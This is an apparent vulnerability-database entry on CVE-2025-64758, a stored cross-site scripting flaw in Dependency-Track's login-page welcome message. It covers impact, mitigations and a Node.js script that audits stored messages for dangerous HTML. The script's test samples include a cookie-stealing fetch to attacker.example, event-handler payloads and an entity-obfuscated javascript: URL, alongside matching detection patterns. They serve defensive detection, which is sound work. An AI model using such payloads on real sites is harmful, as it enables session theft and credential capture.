CVE-2025-64758: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in DependencyTrack frontend
@dependencytrack/frontend is a Single Page Application (SPA) used in Dependency-Track, an open source Component Analysis platform that allows organizations to identify and reduce risk in the software supply chain. Since version 4.12.0, Dependency-Track users with the SYSTEM_CONFIGURATION permission can configure a "welcome message", which is HTML that is to be rendered on the login page for branding purposes. When rendering the welcome message, Dependency-Track versions before 4.13.6 did not properly sanitize the HTML, allowing arbitrary JavaScript to be executed. Users with the SYSTEM_CONFIGURATION permission (i.e., administrators), can exploit this weakness to execute arbitrary JavaScript for users browsing to the login page. The issue has been fixed in version 4.13.6.
AI Analysis
Technical Summary
CVE-2025-64758 is a stored cross-site scripting (XSS) vulnerability (CWE-79) in @dependencytrack/frontend, the Single Page Application of Dependency-Track, an open-source software composition analysis platform used to manage software supply chain risk. Since version 4.12.0, users holding the SYSTEM_CONFIGURATION permission can set a "welcome message": a block of HTML that is stored server-side as part of the system configuration and rendered on the login page for branding. Frontend versions before 4.13.6 rendered that HTML without sanitizing it, so any script the message carries (a script element, an event-handler attribute such as onerror, or a javascript: URL) runs in the browser of every visitor to the login page until the message is changed. Because the payload is persisted and the login page is reached before authentication, the attack does not depend on the victim's session state: a malicious or compromised administrator can turn one configuration field into code execution in every user's browser, capturing credentials as they are typed into the login form, redirecting users to a look-alike identity-provider page, reading whatever the application keeps in browser storage for that origin, or tampering with the SPA's requests. The preconditions are high privilege (SYSTEM_CONFIGURATION, normally administrators) and user interaction (a victim must load the login page), which is why the weakness is best understood as an escalation path from a single administrator account, or an insider, to all users of the instance. Frontend version 4.13.6 fixes the issue by sanitizing the welcome message before it is rendered. No public exploit is known; the realistic exposure is any deployment in which an account holding SYSTEM_CONFIGURATION is compromised, shared, or not otherwise trusted to run code in users' browsers.
Potential Impact
For European organizations, the practical exposure is the login page itself: it is the one page every user loads, including users who are not yet authenticated, and they load it with credentials in hand. Script injected into the welcome message runs in the origin of the Dependency-Track frontend for every visitor until the message is changed, so a single malicious or compromised administrator can capture usernames and passwords as they are typed, redirect users to a look-alike identity-provider page, read whatever the application keeps in browser storage for that origin, or act in the context of a user who then logs in. The confidentiality and integrity impact for users of the instance is therefore high even though the precondition (SYSTEM_CONFIGURATION) is a high privilege and the victim must interact by visiting the page; availability is unaffected. The downstream risk is what the captured credentials unlock: Dependency-Track holds an organization's software bills of materials and the vulnerability findings against them, which is a ready-made map of exploitable components for an attacker, and that access can also support internal phishing or further movement. Where the instance processes personal data of its users, a compromise may additionally carry GDPR notification obligations.
Mitigation Recommendations
European organizations should upgrade to Dependency-Track 4.13.6 or later. The fix lives in the @dependencytrack/frontend package, so deployments that run the API server and the frontend as separate containers or hosts must update the frontend specifically; upgrading only the API server leaves the login page vulnerable. Until the upgrade is in place, the most direct control is to remove or disable the custom welcome message and to restrict SYSTEM_CONFIGURATION to the smallest set of named administrators, with multi-factor authentication on those accounts where the identity provider supports it. Treat the welcome message as code rather than text: keep a known-good copy, re-read the stored value (through the UI or the REST API) on a schedule, and alert on any difference or on constructs a branding message never needs, such as script elements, on*-handler attributes, javascript: or data: URLs, or SVG with event handlers. A Content Security Policy served with the frontend that restricts script-src to the application's own origin and omits 'unsafe-inline' would block inline payloads, but it must be tested against the SPA's own scripts: a policy that breaks the login page will be relaxed, and a policy that allows 'unsafe-inline' blocks nothing. A web application firewall offers little here, because the payload is submitted by an authenticated administrator through the configuration interface and executes client-side, so only trivial payloads would be caught. Focus monitoring on configuration changes and on the accounts able to make them rather than on login-page traffic, which exploitation does not make look unusual. Finally, keep both the API server and frontend images within the organization's normal patch cadence so future frontend fixes are not missed.
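As an added example (not code from the Dependency-Track project or the advisory), the following Node.js script shows what the "audit the welcome message" recommendation looks like in practice: it tokenizes a stored welcome message and reports the constructs that turn unsanitized HTML into script execution, including entity- and whitespace-obfuscated URL schemes that naive string matching misses. The tag and attribute allowlists and the sample messages are constructed assumptions, not values taken from Dependency-Track. It is a detection aid for reviewers and scheduled checks, not a sanitizer: the rendering path needs a real HTML parser with an allowlist, which is what the 4.13.6 fix addresses.

```javascript
// audit-welcome-message.js (added example, not Dependency-Track project code)
// Flags the HTML constructs in a stored "welcome message" that would execute
// script on the login page. Detection aid only; a regex tokenizer is no
// substitute for a parser-based sanitizer in the rendering path.
// Run with: node audit-welcome-message.js

// Tags a branding message plausibly needs (assumed allowlist). Anything else is reported.
const ALLOWED_TAGS = new Set([
  "p", "br", "hr", "b", "i", "u", "strong", "em", "span", "div", "a", "img",
  "h1", "h2", "h3", "h4", "h5", "h6", "ul", "ol", "li",
]);
// Attributes whose value is fetched or navigated to, so the URL scheme matters.
const URL_ATTRS = new Set(["href", "src", "action", "formaction", "xlink:href", "data"]);
const SAFE_SCHEMES = new Set(["http", "https", "mailto"]);
const NAMED_ENTITIES = new Map(Object.entries({
  lt: "<", gt: ">", amp: "&", quot: '"', apos: "'", tab: "\t", newline: "\n",
}));

function safeCodePoint(cp) {
  return cp > 0x10ffff ? "\uFFFD" : String.fromCodePoint(cp);
}

// Decode numeric and common named entities so `&#106;avascript:` is seen as `javascript:`.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => safeCodePoint(parseInt(hex, 16)))
    .replace(/&#(\d+);?/g, (_, dec) => safeCodePoint(parseInt(dec, 10)))
    .replace(/&([a-z]+);/gi, (whole, name) => NAMED_ENTITIES.get(name.toLowerCase()) ?? whole);
}

// Browsers strip ASCII control characters and whitespace before parsing a URL's
// scheme, so `java\tscript:` and ` javascript:` still execute. Mirror that here.
function urlScheme(value) {
  const cleaned = decodeEntities(value).replace(/[\u0000-\u0020]/g, "").toLowerCase();
  const m = cleaned.match(/^([a-z][a-z0-9+.-]*):/);
  return m ? m[1] : null;
}

// Returns a list of findings; an empty list means nothing suspicious was seen.
function auditWelcomeMessage(html) {
  const findings = [];
  // Tokenizer limitation: a literal '>' inside a quoted attribute value ends the tag early.
  const tagRe = /<\s*(\/?)\s*([a-zA-Z][\w:-]*)([^>]*)>/g;
  const attrRe = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const [snippet, closing, rawName, rawAttrs] = tag;
    if (closing) continue; // end tags carry no attributes; the start tag was already judged
    const name = rawName.toLowerCase();
    if (!ALLOWED_TAGS.has(name)) {
      findings.push({ kind: "disallowed-tag", tag: name, snippet });
    }
    let attr;
    attrRe.lastIndex = 0;
    while ((attr = attrRe.exec(rawAttrs)) !== null) {
      const attrName = attr[1].toLowerCase();
      const value = attr[2] ?? attr[3] ?? attr[4] ?? "";
      if (attrName.startsWith("on")) {
        findings.push({ kind: "event-handler", tag: name, attr: attrName, snippet });
      } else if (URL_ATTRS.has(attrName)) {
        const scheme = urlScheme(value);
        if (scheme !== null && !SAFE_SCHEMES.has(scheme)) {
          findings.push({ kind: "dangerous-url-scheme", tag: name, attr: attrName, scheme, snippet });
        }
      } else if (attrName === "style" && /expression\s*\(|url\s*\(|@import/i.test(value)) {
        findings.push({ kind: "active-css", tag: name, attr: attrName, snippet });
      }
    }
  }
  return findings;
}

// Constructed sample messages standing in for values read from an instance.
const SAMPLES = {
  benign: '<h2>Welcome to ACME Dependency-Track</h2><p>Sign in with your <a href="https://sso.example.test/">corporate SSO</a>. <img src="https://static.example.test/logo.png" alt="ACME"></p>',
  scriptTag: "<p>Welcome</p><script>fetch('https://attacker.example/?c=' + document.cookie)</script>",
  eventHandler: '<img src=x onerror="alert(document.domain)">',
  entityObfuscatedUrl: '<a href="&#106;avascript:alert(1)">Help</a>',
  foreignElement: '<svg onload="alert(1)"><circle r="10"/></svg>',
};

for (const [label, html] of Object.entries(SAMPLES)) {
  const findings = auditWelcomeMessage(html);
  console.log(`${label}: ${findings.length === 0 ? "clean" : findings.map((f) => f.kind).join(", ")}`);
}
```

In a scheduled check, feed the script the stored message as fetched from the instance and fail the job on any finding or on any difference from the known-good copy; the allowlists are deliberately narrow so that a false positive prompts a human look rather than a silent pass.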
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Belgium, Italy
Technical Details
- Data Version: 5.2
- Assigner Short Name: GitHub_M
- Date Reserved: 2025-11-10T22:29:34.875Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 691b5ce0c08982598af07859
Added to database: 11/17/2025, 5:35:28 PM
Last enriched: 11/17/2025, 5:41:39 PM
Last updated: 11/22/2025, 2:42:49 PM
Related Threats
- CVE-2024-0401: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in ASUS ExpertWiFi (High)
- CVE-2024-23690: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in Netgear FVS336Gv3 (High)
- CVE-2024-13976: CWE-427 Uncontrolled Search Path Element in Commvault Commvault for Windows (High)
- CVE-2024-12856: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in Four-Faith F3x24 (High)
- CVE-2025-13526: CWE-200 Exposure of Sensitive Information to an Unauthorized Actor in walterpinem OneClick Chat to Order (High)